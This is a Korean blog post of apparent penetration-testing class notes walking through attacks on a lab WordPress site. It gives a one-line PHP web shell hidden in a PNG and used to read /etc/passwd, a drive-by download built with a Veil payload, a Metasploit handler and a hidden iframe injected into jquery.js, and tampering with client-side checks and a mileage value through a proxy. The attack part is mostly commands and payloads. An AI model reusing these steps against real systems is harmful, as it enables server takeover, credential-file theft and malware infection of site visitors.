보안 / 개발 챌린저가 목표

모의해킹 실습 (5) 본문

IT Security/Class_Do it

모의해킹 실습 (5)

햄미은서 2020. 10. 16. 17:06

▶ 이미지 웹쉘 업로드 공격

  ① png 파일을 php 파일로 인식하게 하기

   $ cd /etc/apache2

   $ sudo gedit apache2.conf

   파일을 열어 /var/www 를 검색하여 다음과 같이 수정.

파란색 표시 부분으로 수정

  ② .htaccess 파일을 작성

파란색 부분 작성

   § $ cd /etc/apache2

   § $ sudo gedit apache2.conf

 

  ③ 리눅스는 설정이 바뀌면 다시 한 번 시작해주어야함(재시작)

   § $ sudo a2enmod rewrite

   § $ sudo service apache2 restart

 

  ④ xss.png 파일 안에 script 구문을 넣겠다는 의미의 python 명령어 작성하기

PNG 파일을 이용한 PHP 공격코드 삽입 방법

 

xss.png 파일 안에 script 구문을 삽입

 ☞ github.com/vavkamil/xss2png 참고!

 

  * PHP 단일 - 한줄 웹쉘 코드 예시

      <?php system(\$_GET['0']);?>      ⇒ 0에 파라미터 이름.

 

  ⑤ Kali에서 깃 허브 끌어다가 사용하기

   # git clone https://github.con/vavkamil/xss2png

 

   # cd xss2png/

   # python3 xss2png.py -p "<?php system(\$_GET['0']);?>" -o ~/phpwebshell.png

phpwebshell.png 생성!

  ⑥ wordpress 관리자 페이지에서 해당 사진(phpwebshell.png) 파일을 업로드하기

 

우클릭하여 새창으로 열기

   - 열린 새 창의 주소에 ?0=cat /etc/passwd 추가

   - 웹 서버의 /etc/passwd 파일을 확인이 가능

▷ 드라이브-바이 다운로드

  ① php.ini 파일의 위치를 찾기

   $ cd ~

   $ sudo find / -name php.ini

   

  ② php.ini의 파일 내용을 수정하기

   $ cd /etc/php/7.3/apache2/

   $ sudo gedit php.ini

2M → 200M 으로 변경 후 저장

   $ sudo service apache2 restart

 

  ③ slideshow를 삭제하고 새로운 slideshow를 설치하기

   - 취약한 플러그인을 사용하기 위해! → 내가 관리자이기 때문에 맘대로 할 수 있음

 

 

  ④ webshell.php를 위와 같은 방법(png파일 업로드)으로 업로드 후 이미지를 새 창 열기 하면,

b374k     를 입력하여 접속!

 

  ⑤ 경로 ☞ /var/www/html/wp-includes/js/jquery

 

  여기에서 나의 목표❗ 사이트 방문만 해도 감염되게 하기

 

  ⑥ Veil로 파일 만들기

   - Kali에서,

    # cd Veil/

    # python3 Veil.py

 

   > use 1

   > use 28

 

파일 이름 hi과 설정들

  - set LHOST 192.168.0.130

  - set LPORT 53

  - generate

  - 파일 이름은 hi

  - 1

 

  ⑦ 새 탭에 명령어 쳐서 설정 해주기

   - 파일을 복사해줌 

    # cp /var/lib/veil/output/compiled/hi.exe /var/www/html

    # service apache2 restart

 

    # msfconsole -r /var/lib/veil/output/handlers/hi.rc

 

  ⑧ home - computers - var - www- html - vbscript_godmode.html 파일을 leafpad를 열어 수정하기

파란색 부분을 자신이 설정한 이름 파일에 맞춰 수정해주기!

  ⑨ js 파일에 악성 스크립트 구문을 작성 후 추가

   - document.write("<iframe src='http://192.168.0.130/vbscript_godmode.html' width='0' height='0' frameboard='0'></iframe>");

 

   - jquery.js에 들어가서

 

   - action - edit에서 마지막에 구문 추가

구문 추가 후 저장

 

  ⑩ 피해자의 PC로 192.168.0.104/wordpress에 접속

 

  ⑪ 감염!

▶ 불충분한 인증 및 인가

  - 발생하는 이유 : 서버 측의 검증이 없기 때문!

    ⇒ 서버에 검증하는 것들이 많아지면 서버에 무리가 많이 가서 클라이언트측에서 하라고 함.

 

  *회원가입 우회하기!

join.submit(); 위치 변경

   - join.submit(); 함수 ⇒ 회원가입 완료 누를 때 작동하는 함수

   - 이 함수를 검사하는 로직(아이디 if, 비밀번호 if 등) 위에 올려놓으면 아이디 등이 우회가 가능!

 

  ① 처음 마일리지는 1000. 슬롯 한 번 돌려서 700점으로 떨어짐.

 

  ② proxy를 켜고 다시 한 번 해보기

 

  ③ VALUE의 값을 99999로 조작. 마일리지의 값을 조작!

 

  ④ 조작된 것 확인

 

  ⇒ 이 마일리지를 이용하여 물품을 구매하거나 실제로 어떤 일을 해야 취약점으로 인정.

'IT Security > Class_Do it' 카테고리의 다른 글

모의해킹 실습 (4)  (0) 2020.10.14
모의해킹 실습 (3)  (0) 2020.10.14
모의해킹 실습 (2)  (0) 2020.10.12
모의해킹 실습 (1)  (0) 2020.10.07
네트워크 장비 진단  (0) 2020.09.25
Comments